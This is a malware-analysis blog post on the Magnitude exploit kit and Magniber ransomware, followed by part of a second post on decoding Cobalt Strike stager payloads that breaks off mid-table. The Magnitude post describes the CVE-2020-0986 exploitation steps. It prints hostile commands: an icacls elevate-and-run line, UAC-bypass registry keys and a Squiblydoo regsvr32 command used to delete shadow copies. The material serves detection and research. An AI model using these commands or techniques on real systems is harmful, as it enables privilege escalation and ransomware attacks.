The Magnitude exploit kit, originally known as PopAds, has been around since at least 2012, which is an unusually long lifetime for an exploit kit. However, it’s not the same exploit kit today that it was nine years ago. Pretty much every part of Magnitude has changed multiple times since then. The infrastructure has changed, so has the landing page, the shellcode, the obfuscation, the payload, and most importantly, the exploits. Magnitude currently exploits an Internet Explorer memory corruption vulnerability, CVE-2021-26411, to get shellcode execution inside the renderer process and a Windows memory corruption vulnerability, CVE-2020-0986, to subsequently elevate privileges. A fully functional exploit for CVE-2021-26411 can be found on the Internet and Magnitude uses that public exploit directly, just with some added obfuscation on top. According to the South Korean cybersecurity company ENKI, this CVE was first used in a targeted attack against security researchers, which Google’s Threat Analysis Group attributed to North Korea.

Exploiting CVE-2020-0986 is a bit less straightforward. This vulnerability was first used in a zero-day exploit chain, discovered in-the-wild by Kaspersky researchers who named the attack Operation PowerFall. To the best of our knowledge, this is the first time this vulnerability is being exploited in-the-wild since that attack. Details about the vulnerability were provided in blog posts by both Kaspersky and Project Zero. While both these writeups contain chunks of the exploit code, it must have still been a lot of work to develop a fully functional exploit. Since the exploit from Magnitude is extremely similar to the code from the writeups, we believe that the attackers started from the code provided in the writeup and then added all the missing pieces to get a working exploit.

Interestingly, when we first discovered Magnitude exploiting CVE-2020-0986, it was not weaponized with any malicious payload. All it did after successful exploitation was ping its C&C server with the Windows build number of the victim. At the time, we theorized that this was just a testing version of the exploit and the attackers were trying to figure out which builds of Windows they could exploit before they fully integrated it into the exploit kit. And indeed, a week later we saw an improved version of the exploit and this time, it was carrying the Magniber ransomware as the payload.

Until recently, our detections for Magnitude were protecting on average about a thousand Avast users per day. That number dropped to roughly half after the compliance team of one of the ad networks used by Magnitude kicked the attackers out of their platform. Currently, all the protected users have a South Korean IP address, but just a few weeks back, Taiwanese Internet users were also at risk. Historically, South Korea and Taiwan were not the only countries attacked by Magnitude. Previous reports mention that Magnitude also used to target Hong Kong, Singapore, the USA, and Malaysia, among others. 

The Infrastructure

The Magnitude operators are currently buying popunder ads from multiple adult ad networks. Unfortunately, these ad networks allow them to very precisely target the ads to users who are likely to be vulnerable to the exploits they are using. They can only pay for ads shown to South Korean Internet Explorer users who are running selected versions of Microsoft Windows. This means that a large portion of users targeted by the ads is vulnerable and that the attackers do not have to waste much money on buying ads for users that they are unable to exploit. We reached out to the relevant ad networks to let them know about the abuse of their platforms. One of them successfully terminated the attacker’s account, which resulted in a clear drop in the number of Avast users that we had to protect from Magnitude every day.

Many ad networks allow the advertisers to target their ads only to IE users running specific versions of Windows.

When the malicious ad is shown to a victim, it redirects them through an intermediary URL to a page that serves an exploit for CVE-2021-26411. An example of this redirect chain is binlo[.]info -> fab9z1g6f74k.tooharm[.]xyz -> 6za16cb90r370m4u1ez.burytie[.]top. The first domain, binlo[.]info, is the one that is visible to the ad network. When this domain is visited by someone not targeted by the campaign, it just presents a legitimate-looking decoy ad. We believe that the purpose of this decoy ad is to make the malvertising seem legitimate to the ad network. If someone from the ad network were to verify the ad, they would only see the decoy and most likely conclude that it is legitimate.

One of the decoy ads used by Magnitude. Note that this is nothing but a decoy: there is no reason to believe that SkinMedica would be in any way affiliated with Magnitude.

The other two domains (tooharm[.]xyz and burytie[.]top) are designed to be extremely short-lived. In fact, the exploit kit rotates these domains every thirty minutes and doesn’t reuse them in any way. This means that the exploit kit operators need to register at least 96 domains every day! In addition to that, the subdomains (fab9z1g6f74k.tooharm[.]xyz and 6za16cb90r370m4u1ez.burytie[.]top) are uniquely generated per victim. This makes the exploit kit harder to track and protect against (and more resilient against takedowns) because detection based on domain names is not very effective.

The JavaScript exploit for CVE-2021-26411 is obfuscated with what appears to be a custom obfuscator. The obfuscator is being updated semi-regularly, most likely in an attempt to evade signature-based detection. The obfuscator is polymorphic, so each victim gets a uniquely obfuscated exploit. Other than that, there are not many interesting things to say about the obfuscation, it does the usual things like hiding string/numeric constants, renaming function names, hiding function calls, and more. 

A snippet of the obfuscated JavaScript exploit for CVE-2021-26411

After deobfuscation, this exploit is an almost exact match to a public exploit for CVE-2021-26411 that is freely available on the Internet. The only important change is in the shellcode, where Magnitude obviously provides its own payload. 

Shellcode

The shellcode is sometimes wrapped in a simple packer that uses redundant jmp instructions for obfuscation. This obfuscates every function by randomizing the order of instructions and then adding a jmp instruction between each two consecutive instructions to preserve the original control flow. As with other parts of the shellcode, the order is randomly generated on the fly, so each victim gets a unique copy of the shellcode.

Function obfuscated by redundant jmp instructions. It allocates memory by invoking the NtAllocateVirtualMemory syscall.

As shown in the above screenshot, the exploit kit prefers not to use standard Windows API functions and instead often invokes system calls directly. The function above uses the NtAllocateVirtualMemory syscall to allocate memory. However, note that this exact implementation only works on Windows 10 under the WoW64 subsystem. On other versions of Windows, the syscall numbers are different, so the syscall number 0x18 would denote some other syscall. And this exact implementation also wouldn’t work on native 32-bit Windows, because there it does not make sense to call the FastSysCall pointer at FS:[0xC0]

To get around these problems, this shellcode comes in several variants, each custom-built for a specific version of Windows. Each variant then contains hardcoded syscall numbers fitting the targeted version. Magnitude selects the correct shellcode variant based on the User-Agent string of the victim. But sometimes, knowing the major release version and bitness of Windows is not enough to deduce the correct syscall numbers. For instance, the syscall number for NtOpenProcessToken on 64-bit Windows 10 differs between versions 1909 and 20H2. In such cases, the shellcode obtains the victim’s exact NtBuildNumber from KUSER_SHARED_DATA and uses a hardcoded mapping table to resolve that build number into the correct syscall number. 

Currently, there are only three variants of the shellcode. One for Windows 10 64-bit, one for Windows 7 64-bit, and one for Windows 7 32-bit. However, it is very much possible that additional variants will get implemented in the future.

To facilitate frequent syscall invocation, the shellcode makes use of what we call syscall templates. Below, you can see the syscall template it uses in the WoW64 Windows 10 variant. Every time the shellcode is about to invoke a syscall, it first customizes this template for the syscall it intends to invoke by patching the syscall number (the immediate in the first instruction) and the immediates from the retn instructions (which specify the number of bytes to release from the stack on function return). Once the template is customized, the shellcode can call it and it will invoke the desired syscall. Also, note the branching based on the value at offset 0x254 of the Process Environment Block. This is most likely the malware authors trying to check a field sometimes called dwSystemCallMode to find out if the syscall should be invoked directly using int 0x2e or through the FastSysCall transition.

Syscall template from the WoW64 Windows 10 variant

Now that we know how the shellcode is obfuscated and how it invokes syscalls, let’s get to what it actually does. Note that the shellcode expects to run within the IE’s Enhanced Protected Mode (EPM) sandbox, so it is relatively limited in what it can do. However, the EPM sandbox is not as strict as it could be, which means that the shellcode still has limited filesystem access, public network access and can successfully call many API functions. Magnitude wants to get around the restrictions imposed by the sandbox and so the shellcode primarily functions as a preparation stage for the LPE exploit which is intended to enable Magnitude to break out of the sandbox.

The first thing the shellcode does is that it obtains the integrity level of the current process. There are two URLs embedded in the shellcode and the integrity level is used to determine which one should be used. Both URLs contain a subdomain that is generated uniquely per victim and are protected so that only the intended victim will get any response from them. If the integrity level is Low or Untrusted, the shellcode reaches out to the first URL and downloads an encrypted LPE exploit from there. The exploit is then decrypted using a simple xor-based cipher, mapped into executable memory, and executed.

On the other hand, if the integrity level is Medium or higher, the shellcode determines that it is not running in a sandbox and it skips the LPE exploit. In such cases, it downloads the final payload (currently Magniber ransomware) from the second URL, decrypts it, and then starts searching for a process that it could inject this payload into. For the 64-bit Windows shellcode variants, the target process needs to satisfy all of the following conditions:

  • The target process name is not iexplore.exe
  • The integrity level of the target process is not Low or Untrusted
  • The integrity level of the target process is not higher than the integrity level of the current process
  • The target process is not running in the WoW64 environment
  • (The target process can be opened with PROCESS_QUERY_INFORMATION)

Once a suitable target process is found, the shellcode jumps through the Heaven’s Gate (only in the WoW64 variants) and injects the payload into the target process using the following sequence of syscalls: NtOpenProcess -> NtCreateSection -> NtMapViewOfSection -> NtCreateThreadEx -> NtGetContextThread -> NtSetContextThread -> NtResumeThread. Note that in this execution chain, everything happens purely in memory and this is why Magnitude is often described as a fileless exploit kit. However, the current version is not entirely fileless because, as will be shown in the next section, the LPE exploit drops a helper PE file to the filesystem.

The shellcode’s transition through the heaven’s gate

CVE-2020-0986

Magnitude escapes the EPM sandbox by exploiting CVE-2020-0986, a memory corruption vulnerability in splwow64.exe. Since the vulnerable code is running with medium integrity and a low integrity process can trigger it using Local Procedure Calls (LPC), this vulnerability can be used to get from the EPM sandbox to medium integrity. CVE-2020-0986 and the ways to exploit it are already discussed in detail in blog posts by both Kaspersky and Project Zero. This section will therefore focus on Magnitude’s implementation of the exploit, please refer to the other blog posts for further technical details about the vulnerability. 

The vulnerable code from gdi32.dll can be seen below. It is a part of an LPC server and it can be triggered by an LPC call, with both r8 and rdi pointing into a memory section that is shared between the LPC client and the LPC server. This essentially gives the attacker the ability to call memcpy inside the splwow64 process while having control over all three arguments, which can be immediately converted into an arbitrary read/write primitive. Arbitrary read is just a call to memcpy with the dest being inside the shared memory and src being the target address. Conversely, arbitrary write is a call to memcpy with the dest being the target address and the src being in the shared memory.

The vulnerable code from gdi32.dll. When it gets executed, both r8 and rdi are pointing into attacker-controllable memory.

However, there is one tiny problem that makes exploitation a bit more difficult. As can be seen in the disassembled code above, the count of the memcpy is obtained by adding the dereferenced content of two word pointers, located close by the src address. This is not a problem for (smaller) arbitrary writes, since the attacker can just plant the desired count beforehand into the shared memory. But for arbitrary reads, the count is not directly controllable by the attacker and it can be anywhere between 0 and 0x1FFFE, which could either crash splwow64 or perform a memcpy with either zero or a smaller than desired count. To get around this, the attacker can perform arbitrary reads by triggering the vulnerable code twice. The first time, the vulnerability can be used as an arbitrary write to plant the correct count at the necessary offset and the second time, it can be used to actually read the desired memory content. This technique has some downsides, such as that it cannot be used to read non-writable memory, but that is not an issue for Magnitude.

The exploit starts out by creating a named mutex to make sure that there is only a single instance of it running. Then, it calls CreateDCW to spawn the splwow64 process that is to be exploited and performs all the necessary preparations to enable sending LPC messages to it later on. The exploit also contains an embedded 64-bit PE file, which it drops to %TEMP% and executes from there. This PE file serves two different purposes and decides which one to fulfill based on whether there is a command-line argument or not. The first purpose is to gather various 64-bit pointers and feed them back to the main exploit module. The second purpose is to serve as a loader for the final payload once the vulnerability has been successfully exploited.

There are three pointers that are obtained by the dropped 64-bit PE file when it runs for the first time. The first one is the address of fpDocumentEvent, which stores a pointer to DocumentEvent, protected using the EncodePointer function. This pointer is obtained by scanning gdi32.dll (or gdi32full.dll) for a static sequence of instructions that set the value at this address. The second pointer is the actual address of DocumentEvent, as exported from winspool.drv and the third one is the pointer to system, exported from msvcrt.dll. Once the 64-bit module has all three pointers, it drops them into a temporary file and terminates itself.

The exploit scans gdi32.dll for the sequence of the four underlined instructions and extracts the address of fpDocumentEvent from the operands of the last instruction.
The exploit extracting the address of fpDocumentEvent from gdi32.dll

The main 32-bit module then reads the dropped file and uses the obtained values during the actual exploitation, which can be characterized by the following sequence of actions:

  1. The exploit leaks the value at the address of fpDocumentEvent in the splwow64 process. The value is leaked by sending two LPC messages, using the arbitrary read primitive described above.
  2. The leaked value is an encoded pointer to DocumentEvent. Using this encoded pointer and the actual, raw, pointer to DocumentEvent, the exploit cracks the secret value that was used for pointer encoding. Read the Kaspersky blog post for how this can be done.
  3. Using the obtained secret value, the exploit encodes the pointer to system, so that calling the function DecodePointer on this newly encoded value inside splwow64 will yield the raw pointer to system.
  4. Using the arbitrary write primitive, the exploit overwrites fpDocumentEvent with the encoded pointer to system.
  5. The exploit triggers the vulnerable code one more time. Only this time, it is not interested in any memory copying, so it sets the count for memcpy to zero. Instead, it counts on the fact that splwow64 will try to decode and call the pointer at fpDocumentEvent. Since this pointer was substituted in the previous step, splwow64 will call system instead of DocumentEvent. The first argument to DocumentEvent is read from the shared memory section, which means that it is controllable by the attacker, who can therefore pass an arbitrary command to system
  6. Finally, the exploit uses the arbitrary write primitive one last time and restores fpDocumentEvent to its original value. This is an attempt to clean up after the exploit, but splwow64 might still be unstable because a random pointer got corrupted when the exploit planted the necessary count of the leak during the first step.
The exploit cracking the secret used for encoding fpDocumentEvent

The command that Magnitude executes in the call to system looks like this:

icacls <dropped_64bit_PE> /Q /C /setintegritylevel Medium && <dropped_64bit_PE>

This elevates the dropped 64-bit PE file to medium integrity and executes it for the second time. This time, it will not gather any pointers, but it will instead extract an embedded payload from within itself and inject it into a suitable process. Currently, the injected payload is the Magniber ransomware.

Magniber

Magniber emerged in 2017 when Magnitude started deploying it as a replacement for the Cerber ransomware. Even though it is almost four years old, it still gets updated frequently and so a lot has changed since it was last written about. The early versions featured server-side AES key generation and contained constant fallback encryption keys in case the server was unreachable. A decryptor that worked when encryption was performed using these fallback keys was developed by the Korea Internet & Security Agency and published on No More Ransom. The attackers responded to this by updating Magniber to generate the encryption keys locally, but the custom PRNG based on GetTickCount was very weak, so researchers from Kookmin University were able to develop a method to recover the encrypted files. Unfortunately, Magniber got updated again, and it is currently using the custom PRNG shown below. This function is used to generate a single random byte and it is called 32 times per encrypted file (16 times to generate the AES-128 key and 16 times to generate the IV). 

While this PRNG still looks very weak at first glance, we believe there is no reasonably efficient method to attack it. The tick count is not the problem here: it is with extremely high probability going to be constant throughout all iterations of the loop and its value could be guessed by inspecting event logs and timestamps of the encrypted files. The problem lies in the RtlRandomEx function, which gets called 640 times (2 * 10 * (16 + 16)) per each encrypted file. This means that the function is likely going to get called millions of times during encryption and leaking and tracking its internal state throughout all of these calls unfortunately seems infeasible. At best, it might be possible to decrypt the first few encrypted files. And even that wouldn’t be possible on newer CPUs and Windows versions, because RtlRandomEx there internally uses the rdrand instruction, which arguably makes this a somewhat decent PRNG for cryptography. 

The PRNG used by Magniber to generate encryption keys

The ransomware starts out by creating a named mutex and generating an identifier from the victim’s computer name and volume serial number. Then, it enumerates in random order all logical drives that are not DRIVE_NO_ROOT_DIR or DRIVE_CDROM and proceeds to recursively traverse them to encrypt individual files. Some folders, such as sample music or tor browser, are excluded from encryption, same as all hidden, system, readonly, temporary, and virtual files. The full list of excluded folders can be found in our IoC repository.

Just like many other ransomware strains, Magniber only encrypts files with certain preselected extensions, such as .doc or .xls. Its configuration contains two sets of extension hashes and each file gets encrypted only if the hash of its extension can be found in one of these sets. The division into two sets was presumably done to assign priority to the extensions. Magniber goes through the whole filesystem in two sweeps. In the first one, it encrypts files with extensions from the higher-priority set. In the second sweep, it encrypts the rest of the files with extensions from the lower-priority set. Interestingly, the higher-priority set also contains nine extensions that were additionally obfuscated, unlike the rest of the higher-priority set. It seems that the attackers were trying to hide these extensions from reverse engineers. You can find these and the other extensions that Magniber encrypts in our IoC repository.

To encrypt a file, Magniber first generates a random 128-bit AES key and IV using the PRNG discussed above. For some bizarre reason, it only chooses to generate bytes from the range 0x03 to 0xFC, effectively reducing the size of the keyspace from 25616 to 25016. Magniber then reads the input file by chunks of up to 0x100000 bytes, continuously encrypting each chunk in CBC mode and writing it back to the input file. Once the whole file is encrypted, Magniber also encrypts the AES key and IV using a public RSA key embedded in the sample and appends the result to the encrypted file. Finally, Magniber renames the file by appending a random-looking extension to its name.

However, there is a bug in the encryption process that puts some encrypted files into a nonrecoverable state, where it is impossible to decrypt them, even for the attackers who possess the corresponding private RSA key. This bug affects all files with a size that is a multiple of 0x100000 (1 MiB). To understand this bug, let’s first investigate in more detail how individual files get encrypted. Magniber splits the input file into chunks and treats the last chunk differently. When the last chunk is encrypted, Magniber sets the Final parameter of CryptEncrypt to TRUE, so CryptoAPI can add padding and finalize the encryption. Only after the last chunk gets encrypted does Magniber append the RSA-encrypted AES key to the file. 

The bug lies in how Magniber determines that it is currently encrypting the last chunk: it treats only chunks of size less than 0x100000 as the last chunks. But this does not work for files the size of which is a multiple of 0x100000, because even the last chunk of such files contains exactly 0x100000 bytes. When Magniber is encrypting such files, it never registers that it is encrypting the last chunk, which causes two problems. The first problem is that it never calls CryptEncrypt with Final=TRUE, so the encrypted files end up with invalid padding. The second, much bigger, problem is that Magniber also does not append the RSA-encrypted AES key, because the trigger for appending it is the encryption of the last chunk. This means that the AES key and IV used for the encryption of the file get lost and there is no way to decrypt the file without them.

Magniber’s ransom note

Magniber drops its ransom note into every folder where it encrypted at least one file. An extra ransom note is also dropped into %PUBLIC% and opened up automatically in notepad.exe after encryption. The ransom note contains several URLs leading the victims to the payment page, which instructs them on how to pay the ransom in order to obtain the decryptor. These URLs are unique per victim, with the subdomain representing the victim identifier. Magniber also automatically opens up the payment page in the victim’s browser and while doing so, exfiltrates further information about the ransomware deployment through the URL, such as:

  • The number of encrypted files
  • The total size of all encrypted files
  • The number of encrypted logical drives
  • The number of files encountered (encrypted or not)
  • The version of Windows
  • The victim identifier
  • The version of Magniber

Finally, Magniber attempts to delete shadow copies using a UAC bypass. It writes a command to delete them to HKCU\Software\Classes\mscfile\shell\open\command and then executes CompMgmtLauncher.exe assuming that this will run the command with elevated privileges. But since this particular UAC bypass method was fixed in Windows 10, Magniber also contains another bypass method, which it uses exclusively on Windows 10 machines. This other method works similarly, writing the command to HKCU\Software\Classes\ms-settings\shell\open\command, creating a key named DelegateExecute there, and finally running ComputerDefaults.exe. Interestingly, the command used is regsvr32.exe scrobj.dll /s /u /n /i:%PUBLIC%\readme.txt. This is a technique often referred to as Squiblydoo and it is used to run a script dropped into readme.txt, which is shown below.

The scriptlet dropped to readme.txt, designed to delete shadow copies

Conclusion

In this blog post, we examined in detail the current state of the Magnitude exploit kit. We described how it exploits CVE-2021-26411 and CVE-2020-0986 to deploy ransomware to unfortunate victims who browse the Internet using vulnerable builds of Internet Explorer. We found Magnitude to be a mature exploit kit with a very robust infrastructure. It uses thousands of fresh domains each month and its infection chain is composed of seven stages (not even counting the multiple obfuscation layers). The infrastructure is also well protected, which makes it very challenging for malware analysts to track and research the exploit kit.

We also dug deep into the Magniber ransomware. We found a bug that results in some files being encrypted in such a way that even the attackers can not possibly decrypt them. This underscores the unfortunate fact that paying the ransom is never a guarantee to get the ransomed files back. This is one of the reasons why we urge ransomware victims to try to avoid paying the ransom. 

Even though the attackers behind Magnitude appear to have a good grasp on exploit development, obfuscation, and protection of malicious infrastructure, they seem to have no idea what they are doing when it comes to generating random numbers for cryptographic purposes. This resulted in previous versions of Magniber using flawed PRNGs, which allowed malware researchers to develop decryptors that helped victims recover their ransomed files. However, Magniber was always quick to improve their PRNG, which unfortunately made the decryptors obsolete. The current version of Magniber is using a PRNG that seems to be just secure enough, which makes us believe that there will be no more decryptors in the future.

Indicators of Compromise (IoC)

The full list of IoCs is available at https://github.com/avast/ioc/tree/master/Magnitude.

Redirection page
SHA-256
2cc3ece1163db8b467915f76b187c07e1eb0ca687c8f1efb9d278b8daadbe590
3da50b3752560932d9d123ef813a3b67f5d840fee38a18cc14d18d5dc369bce4
91dbcaa7833aef48fa67c55c26c9c142cb76c5530c0b2a3823c8f74cf52b73cc
db8cf1f5651a44b443a23bc239b4215dcfd0a935458f9d17cb511b2c33e0c3b9
ef15ee0511c2f9e29ecaf907f3ca0bb603f7ec57d320ba61b718c4078b864824
CVE-2021-26411
SHA-256
0306b0b79a85711605bbbfac62ac7d040a556aa7ac9fe58d22ea2e00d51b521a
419da91566a7b1e5720792409301fa772d9abf24dfc3ddde582888112f12937a
6a348a5b13335e453ac34b0ed87e37a153c76a5be528a4ef4b67e988aaf03533
4e80fa124865445719e66d917defd9c8ed3bd436162e3fbc180a12584d372442
217f21bd9d5e92263e3a903cfcea0e6a1d4c3643eed223007a4deb630c4aee26
Shellcode
SHA-256 Note
5d0e45febd711f7564725ac84439b74d97b3f2bc27dbe5add5194f5cdbdbf623 Win10 WoW64 variant
351a2e8a4dc2e60d17208c9efb6ac87983853c83dae5543e22674a8fc5c05234 ^ unpacked
4044008da4fc1d0eb4a0242b9632463a114b2129cedf9728d2d552e379c08037 Win7 WoW64 variant
1ea23d7456195e8674baa9bed2a2d94c7235d26a574adf7009c66d6ec9c994b3 ^ unpacked
3de9d91962a043406b542523e11e58acb34363f2ebb1142d09adbab7861c8a63 Win7 native variant
dfa093364bf809f3146c2b8a5925f937cc41a99552ea3ca077dac0f389caa0da ^ unpacked
e05a4b7b889cba453f02f2496cb7f3233099b385fe156cae9e89bc66d3c80a7f newer Win7 WoW64 variant
ae930317faf12307d3fb9a534fe977a5ef3256e62e58921cd4bf70e0c05bf88a latest Win7 WoW64 variant
CVE-2020-0986
SHA-256 Note
440be2c75d55939c90fc3ef2d49ceeb66e2c762fd4133c935667b3b2c6fb8551 pingback payload
a5edae721568cdbd8d4818584ddc5a192e78c86345b4cdfb4dc2880b9634acab pingback payload
1505368c8f4b7bf718ebd9a44395cfa15657db97a0c13dcf47eb8cfb94e7528b Magniber payload
63525e19aad0aae1b95c3a357e96c93775d541e9db7d4635af5363d4e858a345 Magniber payload
31e99c8f68d340fd046a9f6c8984904331dc6a5aa4151608058ee3aabc7cc905 Magniber payload
Pointer scanner/loader 64-bit module
SHA-256
f8472b1385ed22897c99f413e7b87a05df8be05b270fd57a9b7dd27bed9a79a6
19f57a213e7828e5e32adf169e51e0d165ddf25a6851a726268e10273a8df8b8
b0b709a620509154bc6d7b4e66d0a7daa7fd8ce23d1e104d80128ea3d0bb54e7
d22d616255b3cceff0fbcaba98083f5fda8be951287fb1d1c207fd1887889b2f
7c1fc5dfb970f856abf48cc65bda4f102452216ad8b9f1fe9c7a66650d91959d
Magniber
SHA-256
a2448b93d7c50801056052fb429d04bcf94a478a0a012191d60e595fed63eec4
525f9dbf9a74390fd22779a68f191b099ee9b4d2e8095c57ac1c932629a8af56
3ae5cd106e3130748ef61d317022d7b6ab98a0811088cfc478d49375c352bf04
daf17fbf2bfcfaa2dafb6470a5da0054eb61ab5b44cd8cbbf22f8819f3c432db
fcd8f8647a1d5e08446a392cc6c69090c00714d681c4fa258656e12cd4f80c2e
C&Cs

https://github.com/avast/ioc/blob/master/Magnitude/cncs.txt

Decoy ad domains

https://github.com/avast/ioc/blob/master/Magnitude/decoys.txt

The post Magnitude Exploit Kit: Still Alive and Kicking appeared first on Avast Threat Labs.

Decoding Cobalt Strike: Understanding Payloads

Intro

Cobalt Strike threat emulation software is the de facto standard closed-source/paid tool used by infosec teams in many governments, organizations and companies. It is also very popular in many cybercrime groups which usually abuse cracked or leaked versions of Cobalt Strike. 

Cobalt Strike has multiple unique features, secure communication and it is fully modular and customizable so proper detection and attribution can be problematic. It is the main reason why we have seen use of Cobalt Strike in almost every major cyber security incident or big breach for the past several years.

There are many great articles about reverse engineering Cobalt Strike software, especially beacon modules as the most important part of the whole chain. Other modules and payloads are very often overlooked, but these parts also contain valuable information for malware researchers and forensic analysts or investigators.

The first part of this series is dedicated to proper identification of all raw payload types and how to decode and parse them. We also share our useful parsers, scripts and yara rules based on these findings back to the community

Raw payloads

Cobalt Strike’s payloads are based on Meterpreter shellcodes and include many similarities like API hashing (x86 and x64 versions) or url query checksum8 algo used in http/https payloads, which makes identification harder. This particular checksum8 algorithm is also used in other frameworks like Empire.

Let’s describe interesting parts of each payload separately.

Payload header x86 variant

Default 32bit raw payload’s entry points start with typical instruction CLD (0xFC) followed by CALL instruction and PUSHA (0x60) as the first instruction from API hash algorithm.

x86 payload
Payload header x64 variant

Standard 64bit variants start also with CLD instruction followed by AND RSP,-10h and CALL instruction.

x64 payload

We can use these patterns for locating payloads’ entry points and count other fixed offsets from this position.

Default API hashes

Raw payloads have a predefined structure and binary format with particular placeholders for each customizable value such as DNS queries, HTTP headers or C2 IP address. Placeholder offsets are on fixed positions the same as hard coded API hash values. The hash algorithm is ROR13 and the final hash is calculated from the API function name and DLL name. The whole algorithm is nicely commented inside assembly code on the Metasploit repository.

Python implementation of API hashing algorithm

We can use the following regex patterns for searching hardcoded API hashes:

We can use a known API hashes list for proper payload type identification and known fixed positions of API hashes for more accurate detection via Yara rules.

Payload identification via known API hashes

Complete Cobalt Strike API hash list:

API hash DLL and API name
0xc99cc96a dnsapi.dll_DnsQuery_A
0x528796c6 kernel32.dll_CloseHandle
0xe27d6f28 kernel32.dll_ConnectNamedPipe
0xd4df7045 kernel32.dll_CreateNamedPipeA
0xfcddfac0 kernel32.dll_DisconnectNamedPipe
0x56a2b5f0 kernel32.dll_ExitProcess
0x5de2c5aa kernel32.dll_GetLastError
0x0726774c kernel32.dll_LoadLibraryA
0xcc8e00f4 kernel32.dll_lstrlenA
0xe035f044 kernel32.dll_Sleep
0xbb5f9ead kernel32.dll_ReadFile
0xe553a458 kernel32.dll_VirtualAlloc
0x315e2145 user32.dll_GetDesktopWindow
0x3b2e55eb wininet.dll_HttpOpenRequestA
0x7b18062d wininet.dll_HttpSendRequestA
0xc69f8957 wininet.dll_InternetConnectA
0x0be057b7 wininet.dll_InternetErrorDlg
0xa779563a wininet.dll_InternetOpenA
0xe2899612 wininet.dll_InternetReadFile
0x869e4675 wininet.dll_InternetSetOptionA
0xe13bec74 ws2_32.dll_accept
0x6737dbc2 ws2_32.dll_bind
0x614d6e75 ws2_32.dll_closesocket
0x6174a599 ws2_32.dll_connect
0xff38e9b7 ws2_32.dll_listen
0x5fc8d902 ws2_32.dll_recv
0xe0df0fea ws2_32.dll_WSASocketA
0x006b8029 ws2_32.dll_WSAStartup

Complete API hash list for Windows 10 system DLLs is available here.

Customer ID / Watermark

Based on information provided on official web pages, Customer ID is a 4-byte number associated with the Cobalt Strike licence key and since v3.9 is embedded into the payloads and beacon configs. This number is located at the end of the payload if it is present. Customer ID could be used for specific threat authors identification or attribution, but a lot of Customer IDs are from cracked or leaked versions, so please consider this while looking at these for possible attribution.

DNS stager x86

Typical payload size is 515 bytes or 519 bytes with included Customer ID value. The DNS query name string starts on offset 0x0140 (calculated from payload entry point) and the null byte and max string size is 63 bytes. If the DNS query name string is shorter, then is terminated with a null byte and the rest of the string space is filled with junk bytes.

DnsQuery_A API function is called with two default parameters:

Parameter Value Constant
DNS Record Type (wType) 0x0010 DNS_TYPE_TEXT
DNS Query Options (Options) 0x0248 DNS_QUERY_BYPASS_CACHE
DNS_QUERY_NO_HOSTS_FILE
DNS_QUERY_RETURN_MESSAGE

Anything other than the default values are suspicious and could indicate custom payload.

Python parsing:

Default DNS payload API hashes:

Offset Hash value API name
0x00a3 0xe553a458 kernel32.dll_VirtualAlloc
0x00bd 0x0726774c kernel32.dll_LoadLibraryA
0x012f 0xc99cc96a dnsapi.dll_DnsQuery_A
0x0198 0x56a2b5f0 kernel32.dll_ExitProcess
0x01a4 0xe035f044 kernel32.dll_Sleep
0x01e4 0xcc8e00f4 kernel32.dll_lstrlenA

Yara rule for DNS stagers:

SMB stager x86

The default payload size is 346 bytes plus the length of the pipe name string terminated by a null byte and the length of the Customer ID if present. The pipe name string is located right after the payload code on offset 0x015A in plaintext format.

CreateNamedPipeA API function is called with 3 default parameters:

Parameter Value Constant
Open Mode (dwOpenMode) 0x0003 PIPE_ACCESS_DUPLEX
Pipe Mode (dwPipeMode) 0x0006 PIPE_TYPE_MESSAGE, PIPE_READMODE_MESSAGE
Max Instances (nMaxInstances) 0x0001

Python parsing:

Default SMB payload API hashes:

Offset Hash value API name
0x00a1 0xe553a458 kernel32.dll_VirtualAlloc
0x00c4 0xd4df7045 kernel32.dll_CreateNamedPipeA
0x00d2 0xe27d6f28 kernel32.dll_ConnectNamedPipe
0x00f8 0xbb5f9ead kernel32.dll_ReadFile
0x010d 0xbb5f9ead kernel32.dll_ReadFile
0x0131 0xfcddfac0 kernel32.dll_DisconnectNamedPipe
0x0139 0x528796c6 kernel32.dll_CloseHandle
0x014b 0x56a2b5f0 kernel32.dll_ExitProcess

Yara rule for SMB stagers:

TCP Bind stager x86

The payload size is 332 bytes plus the length of the Customer ID if present. Parameters for the bind API function are stored inside the SOCKADDR_IN structure hardcoded as two dword pushes. The first PUSH with the sin_addr value is located on offset 0x00C4. The second PUSH contains sin_port and sin_family values and is located on offset 0x00C9 The default sin_family value is AF_INET (0x02).

Python parsing:

Default TCP Bind x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00ac 0x006b8029 ws2_32.dll_WSAStartup
0x00bb 0xe0df0fea ws2_32.dll_WSASocketA
0x00d5 0x6737dbc2 ws2_32.dll_bind
0x00de 0xff38e9b7 ws2_32.dll_listen
0x00e8 0xe13bec74 ws2_32.dll_accept
0x00f1 0x614d6e75 ws2_32.dll_closesocket
0x00fa 0x56a2b5f0 kernel32.dll_ExitProcess
0x0107 0x5fc8d902 ws2_32.dll_recv
0x011a 0xe553a458 kernel32.dll_VirtualAlloc
0x0128 0x5fc8d902 ws2_32.dll_recv
0x013d 0x614d6e75 ws2_32.dll_closesocket

Yara rule for TCP Bind x86 stagers:

TCP Bind stager x64

The payload size is 510 bytes plus the length of the Customer ID if present. The SOCKADDR_IN structure is hard coded inside the MOV instruction as a qword and contains the whole structure. The offset for the MOV instruction is 0x00EC.

Python parsing:

Default TCP Bind x64 payload API hashes:

Offset Hash value API name
0x0100 0x0726774c kernel32.dll_LoadLibraryA
0x0111 0x006b8029 ws2_32.dll_WSAStartup
0x012d 0xe0df0fea ws2_32.dll_WSASocketA
0x0142 0x6737dbc2 ws2_32.dll_bind
0x0150 0xff38e9b7 ws2_32.dll_listen
0x0161 0xe13bec74 ws2_32.dll_accept
0x016f 0x614d6e75 ws2_32.dll_closesocket
0x0198 0x5fc8d902 ws2_32.dll_recv
0x01b8 0xe553a458 kernel32.dll_VirtualAlloc
0x01d2 0x5fc8d902 ws2_32.dll_recv
0x01ee 0x614d6e75 ws2_32.dll_closesocket

Yara rule for TCP Bind x64 stagers:

TCP Reverse stager x86

The payload size is 290 bytes plus the length of the Customer ID if present. This payload is very similar to TCP Bind x86 and SOCKADDR_IN structure is hardcoded on the same offset with the same double push instructions so we can reuse python parsing code from TCP Bind x86 payload.

Default TCP Reverse x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00ac 0x006b8029 ws2_32.dll_WSAStartup
0x00bb 0xe0df0fea ws2_32.dll_WSASocketA
0x00d5 0x6174a599 ws2_32.dll_connect
